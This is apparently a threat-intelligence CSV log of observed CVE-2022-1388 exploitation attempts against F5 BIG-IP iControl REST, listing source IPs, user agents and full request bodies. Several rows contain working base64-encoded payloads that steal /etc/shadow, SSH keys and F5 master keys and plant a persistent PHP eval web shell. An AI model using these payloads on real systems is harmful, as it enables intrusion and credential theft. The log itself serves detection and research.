internetweather

CVE-2022-1388 events from AS55286.csv

May 19th, 2022
  1. Source IP,Country,User Agent,Payload,POST Data,Target Port,Tags,Date First Seen,Date Last Seen,Event Count
  2. 209.127.253.120,United States,Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101211 Firefox/3.6.13 (Palemoon/3.6.13) GTB7.1,POST /mgmt/tm/util/bash HTTP/1.1,"""{\x22command\x22: \x22run\x22, \x22utilCmdArgs\x22: \x22-c \x5C\x22echo Cm1vdW50IC1vICBydyxyZW1vdW50IC91c3I7CnJtIC1yZiAvdXNyL2xvY2FsL3d3dy94dWkvY29tbW9uL2Nzcy8yKi5jc3M7Cm1vdW50IC1vIHJvLHJlbW91bnQgL3VzcjsK|base64 -d > /tmp/f5.sh;/bin/bash /tmp/f5.sh;rm /tmp/f5.sh;\x5C\x22\x22}""",443,F5 iControl REST RCE | Platform | CVE-2022-1388,2022-05-10T09:27:41Z,2022-05-10T09:27:41Z,1
  3. 144.168.221.206,United States,Baiduspider+(+http://www.baidu.com/search/spider.htm),POST /mgmt/tm/util/bash HTTP/1.1,"""{\x22command\x22: \x22run\x22, \x22utilCmdArgs\x22: \x22-c \x5C\x22tar cJhf - /root/.ssh/ | base64 -w 0\x5C\x22\x22}""",8443,F5 iControl REST RCE | Platform | CVE-2022-1388,2022-05-09T18:48:18Z,2022-05-09T18:48:18Z,1
  4. 192.241.67.90,United States,Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.1pre) Gecko/20090717 SeaMonkey/2.0b1,POST /mgmt/tm/util/bash HTTP/1.1,"""{\x22command\x22: \x22run\x22, \x22utilCmdArgs\x22: \x22-c \x5C\x22tar cJhf - /root/.ssh/ | base64 -w 0\x5C\x22\x22}""",2083,F5 iControl REST RCE | Platform | CVE-2022-1388,2022-05-09T18:30:15Z,2022-05-09T18:30:15Z,1
  5. 144.168.158.166,United States,Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090410 Minefield/3.6a1pre,POST /mgmt/tm/util/bash HTTP/1.1,"""{\x22command\x22: \x22run\x22, \x22utilCmdArgs\x22: \x22-c \x5C\x22echo CmVjaG8gIj09PT09IjsgCmNhdCAvZXRjL2hvc3RuYW1lOyAKZWNobyAiPT09PT0iOyAgCmNhdCAvZXRjL2hvc3RzOyAgCmVjaG8gIj09PT09IjsgIApjYXQgL2V0Yy9wYXNzd2Q7ICAKZWNobyAiPT09PT0iOyAgCmNhdCAvZXRjL3NoYWRvdzsgIAplY2hvICI9PT09PSI7ICAKY2F0IC9ldGMvcmVzb2x2LmNvbmY7ICAKZWNobyAiPT09PT0iOyAgCmY1bWt1IC1mIDsgIAplY2hvICI9PT09PSI7ICAgCmY1bWt1IC1LOyAgCmVjaG8gIj09PT09IjsgIApmNW1rdSAtWjsgIAplY2hvICI9PT09PSI7ICAKbW91bnQgLW8gIHJ3LHJlbW91bnQgL3VzcjsKdGFyIHpjZiAvdXNyL2xvY2FsL3d3dy94dWkvY29tbW9uL2Nzcy8yNmY1M2M3YTZjNC5jc3MgL2NvbmZpZy8qIC9yb290Ly5iYXNoX2hpc3Rvcnk7CmVjaG8gIjw/cGhwIEBldmFsKGJhc2U2NF9kZWNvZGUoXCRfUE9TVFsnNmY1M2M3YTZjNCddKSk7IiA IC91c3IvbG9jYWwvd3d3L3h1aS9jb21tb24vY3NzLzZmNTNjN2E2YzRjc3MucGhwOwplY2hvICJlY2hvIFwiPD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZShcXFwkX1BPU1RbJzZmNTNjN2E2YzQnXSkpO1wiID4gL3Vzci9sb2NhbC93d3cveHVpL2NvbW1vbi9jc3MvNmY1M2M3YTZjNGNzcy5waHAiID4 IC9jb25maWcvc3RhcnR1cDsKbW91bnQgLW8gcm8scmVtb3VudCAvdXNyOwo=|base64 -d > /tmp/f5.sh;/bin/bash /tmp/f5.sh;rm /tmp/f5.sh;\x5C\x22\x22}""",2083,F5 iControl REST RCE | Platform | CVE-2022-1388,2022-05-09T07:25:40Z,2022-05-09T07:25:40Z,1
  6. 144.168.218.38,United States,Mozilla/4.76 [en] (Win95; U),POST /mgmt/tm/util/bash HTTP/1.1,"""{\x22command\x22: \x22run\x22, \x22utilCmdArgs\x22: \x22-c \x5C\x22echo CmVjaG8gIj09PT09IjsgCmNhdCAvZXRjL2hvc3RuYW1lOyAKZWNobyAiPT09PT0iOyAgCmNhdCAvZXRjL2hvc3RzOyAgCmVjaG8gIj09PT09IjsgIApjYXQgL2V0Yy9wYXNzd2Q7ICAKZWNobyAiPT09PT0iOyAgCmNhdCAvZXRjL3NoYWRvdzsgIAplY2hvICI9PT09PSI7ICAKY2F0IC9ldGMvcmVzb2x2LmNvbmY7ICAKZWNobyAiPT09PT0iOyAgCmY1bWt1IC1mIDsgIAplY2hvICI9PT09PSI7ICAgCmY1bWt1IC1LOyAgCmVjaG8gIj09PT09IjsgIApmNW1rdSAtWjsgIAplY2hvICI9PT09PSI7ICAKbW91bnQgLW8gIHJ3LHJlbW91bnQgL3VzcjsKdGFyIHpjZiAvdXNyL2xvY2FsL3d3dy94dWkvY29tbW9uL2Nzcy8yZmU2MzM2MmRhNS5jc3MgL2NvbmZpZy8qIC9yb290Ly5iYXNoX2hpc3Rvcnk7CmVjaG8gIjw/cGhwIEBldmFsKGJhc2U2NF9kZWNvZGUoXCRfUE9TVFsnZmU2MzM2MmRhNSddKSk7IiA IC91c3IvbG9jYWwvd3d3L3h1aS9jb21tb24vY3NzL2ZlNjMzNjJkYTVjc3MucGhwOwplY2hvICJlY2hvIFwiPD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZShcXFwkX1BPU1RbJ2ZlNjMzNjJkYTUnXSkpO1wiID4gL3Vzci9sb2NhbC93d3cveHVpL2NvbW1vbi9jc3MvZmU2MzM2MmRhNWNzcy5waHAiID4 IC9jb25maWcvc3RhcnR1cDsKbW91bnQgLW8gcm8scmVtb3VudCAvdXNyOwo=|base64 -d > /tmp/f5.sh;/bin/bash /tmp/f5.sh;rm /tmp/f5.sh;\x5C\x22\x22}""",443,F5 iControl REST RCE | Platform | CVE-2022-1388,2022-05-09T06:06:28Z,2022-05-09T06:06:28Z,1